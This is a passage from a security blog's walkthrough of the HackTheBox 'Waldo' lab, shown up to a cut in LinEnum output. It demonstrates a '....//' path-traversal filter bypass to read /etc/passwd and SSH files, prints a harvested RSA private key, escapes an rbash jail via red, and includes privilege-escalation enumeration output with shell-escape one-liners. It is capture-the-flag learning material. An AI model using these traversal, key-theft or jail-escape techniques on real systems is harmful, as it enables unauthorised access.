NeilSec: Security Learning Blog

Pentesting, infosec, hacking, learning.

  • Home
  • Knowledgebase
You are here: Home / Penetration Testing / HackTheBox: Waldo – Walkthough

HackTheBox: Waldo – Walkthough

2018-09-11 by Neil Leave a Comment

Initial Enumeration

So we have a linux box with 2 open ports and a filtered port. Let’s check out the ports in turn:

22/OpenSSH 7.5p2

Not much use at this stage. No known exploits for it and no usernames to even brute force

80/HTTP nginx 1.12.2

Browsing to the site shows:

It’s a Where’s Waldo (that’s Where’s Wally to us Brits) themed site with a web app called List Manager. If you click Add List, a list is added and given the next number in the the sequence. And you can delete it with the Delete button.

Viewing the page source we can see it uses a Javascript function called list.js

and we can look at the code for that. Here is some of it:

I’m no Javascript expert but I can see some php files being called: fileWrite.php and fileDelete.php etc and a POST request is being used.

Time to fire up Burp Suite to intercept and analyse these requests. Using FoxyProxy to make switching traffic to Burp easy, turn on Intercept and try the Add List button:

As suspected that button sends a POST request using the fileWrite.php which is in the root web folder /. There are some parameters there in Body. We can specify the listnumber with the listnum parameter and even add data to it using the data parameter

If we click on one of the lists on the screen we see another php file called fileRead.php

To speed up this discovery process, I just try clicking every possible option, knowing that Burp will store the results in the Site Map:

Also worth noting here is that the dirRead.php refers to a directory: /.list

What do we know about this web app so far?:

In the root directory 10.10.10.84/ we have:

  • list.html
  • list.js
  • dirRead.php
  • fileDelete.php
  • fileRead.php
  • fileWrite.php

And there is a directory /.list/ which we don’t have permission to access. We can alter the parameters being sent to via the POST requests.

With Burp the easiest way of fiddling around with these things is to use the Repeater module which allows you to repeated send requests without having to re-write them each time and allows you to edit any part of them, go back to previous edits etc. In the HTTP History section of the proxy, we find each relevant request, right-click and select Send to Repeater.

Using Repeater I use the fileWrite.php function to create “list 99” just to see if I can, and add some arbitrary data to it. Then I see if I can see if I can find it using dirRead.php, which I can. I can also read the file itself using fileRead.php. Unfortunately writing php code into the list file doesn’t execute so no easy shell there. This is likely because I’m using a php function to read the file rather than GETting it which would trigger the PHP interpreter. The list files, including my “list99” are being stored in 10.10.10.87/.list which is not accessible by the browser or other GET request mechanisms. However all is not lost because whilst I cannot render PHP, that means I can read PHP source code and so let’s look at these files, starting with the fileRead.php itself:

The php source code is being mangled. I don’t know if there is an elegant way of sorting this out but I used Word’s find and replace function to replace the escape characters to swap these:

\n = newline
\t = tab
\” = ‘
\/ = /

and got this far:

<?php
if($_SERVER['REQUEST_METHOD'] === ‘POST’)
{
                $fileContent['file'] = false;
                header('Content-Type: application/json');

                if(isset($_POST['file'])){
                                header('Content-Type: application/json');
                                $_POST['file'] = str_replace( array(‘../’, ‘..\’), ‘‘, $_POST['file']);
                                if(strpos($_POST['file'], ‘user.txt’) === false){
                                                $file = fopen(‘/var/www/html/’ . $_POST['file'], ‘r’);
                                                $fileContent['file'] = fread($file,filesize($_POST['file']));  
                                                fclose();
                                }
                }
                echo json_encode($fileContent);
}

My PHP isn’t great so this could be wrong but it’s clear there is some filtering going on to stop you from just browsing for files easily. Straight away we can see that it’s not going to let you read the user.txt file! And then it looks like it’s deleting “../” and “..\” which is going to make the usual directory traversal techniques harder. Normally you just use ../ to go up in the directory tree but this will merely delete that. After messing around with it for a file I hit upon the idea of using ….// so that when the ../ is deleted, we’re left with  ../  and this works find and I’m able to read the /etc/passwd file at …//…//…//etc/passwd

Note there is a user with a bin/sh login called “nobody”. Let’s check out his home folder. There are several files in there:

[".","..",".ash_history",".ssh",".viminfo","user.txt"]

We know we cannot read user.txt but in .ssh directory there are very interesting files, not least the .monitor file containing an private RSA key:

SSH allows authenticating via public/private key pairs instead of passwords. The private key is the one required by the ssh client so we should be able to use this to ssh in. However it looks a bit mangled so hopefully our find/replace system will work on this too. After running it through that I get:

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAs7sytDE++NHaWB9e+NN3V5t1DP1TYHc+4o8D362l5Nwf6Cpl
mR4JH6n4Nccdm1ZU+qB77li8ZOvymBtIEY4Fm07X4Pqt4zeNBfqKWkOcyV1TLW6f
87s0FZBhYAizGrNNeLLhB1IZIjpDVJUbSXG6s2cxAle14cj+pnEiRTsyMiq1nJCS
dGCc/gNpW/AANIN4vW9KslLqiAEDJfchY55sCJ5162Y9+I1xzqF8e9b12wVXirvN
o8PLGnFJVw6SHhmPJsue9vjAIeH+n+5Xkbc8/6pceowqs9ujRkNzH9T1lJq4Fx1V
vi93Daq3bZ3dhIIWaWafmqzg+jSThSWOIwR73wIDAQABAoIBADHwl/wdmuPEW6kU
vmzhRU3gcjuzwBET0TNejbL/KxNWXr9B2I0dHWfg8Ijw1Lcu29nv8b+ehGp+bR/6
pKHMFp66350xylNSQishHIRMOSpydgQvst4kbCp5vbTTdgC7RZF+EqzYEQfDrKW5
8KUNptTmnWWLPYyJLsjMsrsN4bqyT3vrkTykJ9iGU2RrKGxrndCAC9exgruevj3q
1h+7o8kGEpmKnEOgUgEJrN69hxYHfbeJ0Wlll8Wort9yummox/05qoOBL4kQxUM7
VxI2Ywu46+QTzTMeOKJoyLCGLyxDkg5ONdfDPBW3w8O6UlVfkv467M3ZB5ye8GeS
dVa3yLECgYEA7jk51MvUGSIFF6GkXsNb/w2cZGe9TiXBWUqWEEig0bmQQVx2ZWWO
v0og0X/iROXAcp6Z9WGpIc6FhVgJd/4bNlTR+A/lWQwFt1b6l03xdsyaIyIWi9xr
xsb2sLNWP56A/5TWTpOkfDbGCQrqHvukWSHlYFOzgQa0ZtMnV71ykH0CgYEAwSSY
qFfdAWrvVZjp26Yf/jnZavLCAC5hmho7eX5isCVcX86MHqpEYAFCecZN2dFFoPqI
yzHzgb9N6Z01YUEKqrknO3tA6JYJ9ojaMF8GZWvUtPzN41ksnD4MwETBEd4bUaH1
/pAcw/+/oYsh4BwkKnVHkNw36c+WmNoaX1FWqIsCgYBYw/IMnLa3drm3CIAa32iU
LRotP4qGaAMXpncsMiPage6CrFVhiuoZ1SFNbv189q8zBm4PxQgklLOj8B33HDQ/
lnN2n1WyTIyEuGA/qMdkoPB+TuFf1A5EzzZ0uR5WLlWa5nbEaLdNoYtBK1P5n4Kp
w7uYnRex6DGobt2mD+10cQKBgGVQlyune20k9QsHvZTU3e9z1RL+6LlDmztFC3G9
1HLmBkDTjjj/xAJAZuiOF4Rs/INnKJ6+QygKfApRxxCPF9NacLQJAZGAMxW50AqT
rj1BhUCzZCUgQABtpC6vYj/HLLlzpiC05AIEhDdvToPK/0WuY64fds0VccAYmMDr
X/PlAoGAS6UhbCm5TWZhtL/hdprOfar3QkXwZ5xvaykB90XgIps5CwUGCCsvwQf2
DvVny8gKbM/OenwHnTlwRTEj5qdeAM40oj/mwCDc6kpV1lJXrW2R5mCH9zgbNFla
W0iKCBUAm5xZgU/YskMsCBMNmA8A5ndRWGFEFE+VGDVPaRie0ro=
-----END RSA PRIVATE KEY-----

That looks very much like a legit RSA key to. So now to paste that into a key file, set the permissions of the file to secure it (ssh requires this) and see if it works:

We’re in! Let’s grab the user.txt file to paste into the HTB system and move on.

In the .ssh folder there is an authorized_keys files containing a reference to a user called monitor:

This is confusing. I would assume that the nobody key is authorised (or how else did it work) and yet this file only has one key and it mentions “monitor@waldowalso. Weird. And why “@waldowaldo” when the machine is called “waldo”?

I’m going to check that this is the key we just used, just to be sure. The easiest way is to use the ssh keygen to generate a public key from the private key we have and see if it matches this one in the authorized_keys file:

root@kali:~/HTB/Waldo# ssh-keygen -y -e -f key
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by root@kali from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQCzuzK0MT740dpYH17403dXm3UM/VNgdz7ijwPfra
Xk3B/oKmWZHgkfqfg1xx2bVlT6oHvuWLxk6/KYG0gRjgWbTtfg+q3jN40F+opaQ5zJXVMt
bp/zuzQVkGFgCLMas014suEHUhkiOkNUlRtJcbqzZzECV7XhyP6mcSJFOzIyKrWckJJ0YJ
z+A2lb8AA0g3i9b0qyUuqIAQMl9yFjnmwInnXrZj34jXHOoXx71vXbBVeKu82jw8sacUlX
DpIeGY8my572+MAh4f6f7leRtzz/qlx6jCqz26NGQ3Mf1PWUmrgXHVW+L3cNqrdtnd2Egh
ZpZp+arOD6NJOFJY4jBHvf
---- END SSH2 PUBLIC KEY ----
root@kali:~/HTB/Waldo#

And of course it does. So WTF is monitor@waldowaldo about then?

Notice how when we ssh’d in, we got a “Welcome to Alpine Wiki” message?. Let’s run a privesc tool and see what else

waldo:/tmp$ python linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 4.9.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.88-1 (2018-04-29)
[+] Hostname
waldo
[+] Operating System
Welcome to Alpine Linux 3.6
Kernel \r on an \m (\l)
[*] GETTING NETWORKING INFO...
[+] Interfaces
docker0 Link encap:Ethernet HWaddr 02:42:07:0A:99:80
inet addr:172.17.0.1 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
ens33 Link encap:Ethernet HWaddr 00:50:56:A4:A8:C1
inet addr:10.10.10.87 Bcast:10.10.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1143587 errors:0 dropped:102 overruns:0 frame:0
TX packets:965321 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:161520906 (154.0 MiB) TX bytes:201250810 (191.9 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:4416890 errors:0 dropped:0 overruns:0 frame:0
TX packets:4416890 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:560407680 (534.4 MiB) TX bytes:560407680 (534.4 MiB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 1152 10.10.10.87:8888 10.10.14.19:51932 ESTABLISHED -
tcp 0 0 :::80 :::* LISTEN -
tcp 0 0 :::22 :::* LISTEN -
tcp 0 0 :::8888 :::* LISTEN -
udp 0 0 10.10.10.87:35491 10.10.10.2:53 ESTABLISHED -
[+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 10.10.10.2 0.0.0.0 UG 0 0 0 ens33
10.10.10.0 * 255.255.255.0 U 0 0 0 ens33
169.254.0.0 * 255.255.0.0 U 1000 0 0 ens33
172.17.0.0 * 255.255.0.0 U 0 0 0 docker0
[*] GETTING FILESYSTEM INFO...
[+] Mount results
[+] fstab entries
/dev/cdrom /media/cdrom iso9660 noauto,ro 0 0
/dev/usbdisk /media/usb vfat noauto,ro 0 0
[+] Scheduled cron jobs
total 12
drwxr-xr-x 2 root root 4096 Jan 9 2018 .
drwxr-xr-x 1 root root 4096 May 3 20:50 ..
-rw------- 1 root root 283 Apr 24 2017 root
[+] Writable cron dirs

[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
[+] Super Users Found:
root
[+] Environment
USER=nobody
SSH_CLIENT=10.10.14.19 51932 8888
MAIL=/var/mail/nobody
SHLVL=2
HOME=/home/nobody
OLDPWD=/
SSH_TTY=/dev/pts/1
PAGER=less
PS1=\h:\w\$
LOGNAME=nobody
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
SHELL=/bin/sh
PWD=/tmp
SSH_CONNECTION=10.10.14.19 51932 10.10.10.87 8888
CHARSET=UTF-8
[+] Root and current user history (depends on privs)
lrwxrwxrwx 1 root root 9 Jul 24 11:57 /home/nobody/.ash_history -> /dev/null
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/home/nobody:/bin/sh
nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin
[+] Current User
nobody
[+] Current User ID
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 40 Sep 10 02:02 /dev/shm
drwxrwxrwt 2 root root 40 Sep 10 02:02 /dev/mqueue
drwxrwxrwt 2 root root 40 Sep 10 02:02 /sys/firmware
drwxrwxrwt 1 root root 4096 Sep 12 10:06 /tmp
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
--w--w--w- 1 root root 0 Sep 10 02:02 /sys/fs/cgroup/memory/cgroup.event_control
[+] Checking if root's home folder is accessible
/root:
total 0
[+] SUID/SGID Files and Directories
-rwsr-xr-x 1 root root 41984 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 50016 May 17 2017 /usr/bin/chage
-rwsr-xr-x 1 root root 18536 May 17 2017 /usr/bin/expiry
-rwsr-xr-x 1 root root 41464 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 32256 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 31616 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 54744 May 17 2017 /usr/bin/gpasswd
-rwxr-sr-x 1 root shadow 26328 May 16 2017 /sbin/unix_chkpwd
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
[+] Current processes
PID USER
1 root
7 root daemon off;
8 root
9 root
10 nginx
1142 root
1144 nobody
1145 nobody
1181 nobody
1263 nobody awk '{print $1,$2,$9,$10,$11}'
1264 nobody
1265 nobody
[+] Apache Version and Modules
[+] Apache Config File
[+] Sudo Version (Check out https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
1 root 
8 root 
7 root daemon off; 
1142 root 
9 root
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/python
/usr/bin/vi
/usr/bin/vim
/usr/bin/find
/usr/bin/nc
/usr/bin/wget
/usr/bin/tftp
[+] Related Shell Escape Sequences...
vi--> :!bash
vi--> :set shell=/bin/bash:shell
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || https://www.exploit-db.com/exploits/5720 || Language=python
- Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit || https://www.exploit-db.com/exploits/3384 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || https://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || https://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || https://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || https://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || https://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || https://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
waldo:/tmp$

That is an oddly minimal output compared to the usual ones.

There are q few hidden files and a directory in nobody’s home folder:

The user.txt token is there and readable so Step 1 accomplished.

In the .ssh folder:

And let’s check out the .viminfo file. There’s quite a lot on it and most of it centres around changes made to the following files: ~/rootkey and  dev/shm/id_rsa  – neither of which appear to exist anymore.

The .monitor file is a private RSA key file. It is not the same one we used to ssh in as the user nobody:

At this point I got caught up in trying to work out why root’s shell was /bin/ash and not /bin/bash which led me to finding out we were on some sort of BusyBox machine etc when I should have seen what was in front of me: if you’ve been  given something as valuable as a private SSH key and user name (“monitor” then you sure as hell ought to try at least using them. The problem is I’d made the mistake of looking at some hints on the HTB forum which totally misled me and I ended up wasting hours chasing irrelevant nonsense. Sometimes a little (cryptic) knowledge is a dangerous thing.

So using the .monitor key, just as before we find Waldo:

The monitor user is even more restricted than then nobody and appears to be in a chroot “jail”.  Files from hi home directory:

As you can see, he has very limited commands available but does have PATH set up for the app-dev folder files:

Escaping rbash Jail

Just 4 commands available: ls, most, red and rnano. These are symbolic links to the files in the root system outside of our chroot jail. The commands:

  • ls is just the normal ls
  • most is another output paging thing like more or less
  • red is a restricted form of ed, which is a line-based text editor, apparently
  • rnano is a restricted form of nano, the popular linux editor.

Interestingly though, the symlinks of red and rnano actually go to their unrestricted counterparts which might be relevant.

Maybe we can use this fact to browse or otherwise edit items outside of the chroot jail? I tried opening a file in nano using Ctrl-R but got an error saying it was not allowed in restricted mode, so maybe my theory isn’t sound? I don’t know the first thing about red/ed so will have to google that. First page I found was: https://www.tutorialspoint.com/unix_commands/ed.htm

First thing I tried was to give my ed session a prompt “red:” – just to amuse myself and so it was clear that ed command worked:

According to that guide you can specify a file to edit but if you prefix it with a bang ! then it will be interpreted as a shell command and so the obvious move is to open a shell outside of the chroot jail and thus escape it, and this works perfectly:

Now for a bit of enumeration:

monitor@waldo:/tmp$ LinEnum.sh
########################################################## Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# 
[-] Debug Info
[+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)

Scan started at:
Thu Sep 13 09:38:53 EDT 2018

### SYSTEM ##############################################
[-] Kernel information:
Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.9.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.88-1 (2018-04-29)

[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

[-] Hostname:
waldo

### USER/GROUP ##########################################
[-] Current user/group info:
uid=1001(monitor) gid=1001(monitor) groups=1001(monitor)

[-] Who else is logged on:
 09:38:53 up  5:34,  1 user,  load average: 0.13, 0.03, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
monitor  pts/0    127.0.0.1        06:27    4.00s  6.28s  0.00s /bin/bash /tmp/LinEnum.sh

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(avahi-autoipd) gid=109(avahi-autoipd) groups=109(avahi-autoipd)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(steve) gid=1000(steve) groups=1000(steve),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth)
uid=1001(monitor) gid=1001(monitor) groups=1001(monitor)
uid=1002(app-dev) gid=1002(app-dev) groups=1002(app-dev)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
avahi-autoipd:x:105:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
steve:x:1000:1000:steve,,,:/home/steve:/bin/bash
monitor:x:1001:1001:User for editing source and monitoring logs,,,:/home/monitor:/bin/rbash
app-dev:x:1002:1002:User for managing app-dev,,,:/home/app-dev:/bin/bash

[-] Super user account(s):
root

[-] Are permissions on /home directories lax:
total 20K
drwxr-xr-x  5 root    root    4.0K May  3 16:50 .
drwxr-xr-x 22 root    root    4.0K May  1 23:04 ..
drwxr-xr-x  2 app-dev app-dev 4.0K May  3 16:50 app-dev
drwxr-x---  5 root    monitor 4.0K Jul 24 07:58 monitor
drwxr-xr-x  2 steve   steve   4.0K May  1 23:30 steve

### ENVIRONMENTAL #######################################
[-] Environment information:
SSH_CONNECTION=127.0.0.1 35820 127.0.1.1 22
LANG=en_US.UTF-8
OLDPWD=/home/monitor
XDG_SESSION_ID=11
USER=monitor
PWD=/tmp
HOME=/home/monitor
SSH_CLIENT=127.0.0.1 35820 22
SSH_TTY=/dev/pts/0
MAIL=/var/mail/monitor
TERM=xterm-256color
SHELL=/bin/rbash
SHLVL=3
LOGNAME=monitor
XDG_RUNTIME_DIR=/run/user/1001
PATH=PATH$:/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/etc/:/tmp/
_=/usr/bin/env

[-] Path information:
PATH$:/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/etc/:/tmp/

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

[-] Current umask value:
0111
u=rw,g=rw,o=rw

[-] umask value as specified in /etc/login.defs:
UMASK		022

[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Oct  7  2017 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x  2 root root 4096 May  1 23:26 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rw-r--r--  1 root root  285 May 29  2017 anacron
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
/etc/cron.daily:
total 40
drwxr-xr-x  2 root root 4096 May  1 23:26 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rwxr-xr-x  1 root root  311 May 29  2017 0anacron
-rwxr-xr-x  1 root root 1474 Sep 13  2017 apt-compat
-rwxr-xr-x  1 root root  355 Oct 25  2016 bsdmainutils
-rwxr-xr-x  1 root root 1597 Feb 22  2017 dpkg
-rwxr-xr-x  1 root root   89 May  5  2015 logrotate
-rwxr-xr-x  1 root root 1065 Dec 13  2016 man-db
-rwxr-xr-x  1 root root  249 May 17  2017 passwd
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 May  1 23:03 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
/etc/cron.monthly:
total 16
drwxr-xr-x  2 root root 4096 May  1 23:26 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rwxr-xr-x  1 root root  313 May 29  2017 0anacron
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 May  1 23:26 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rwxr-xr-x  1 root root  312 May 29  2017 0anacron
-rwxr-xr-x  1 root root  723 Dec 13  2016 man-db
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

[-] Anacron jobs and associated file permissions:
-rw-r--r-- 1 root root 401 May 29  2017 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron
# See anacron(8) and anacrontab(5) for details.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root
# These replace cron's entries
1	5	cron.daily	run-parts --report /etc/cron.daily
7	10	cron.weekly	run-parts --report /etc/cron.weekly
@monthly	15	cron.monthly	run-parts --report /etc/cron.monthly

[-] When were jobs last executed (/var/spool/anacron contents):
total 20
drwxr-xr-x 2 root root 4096 May  3 16:44 .
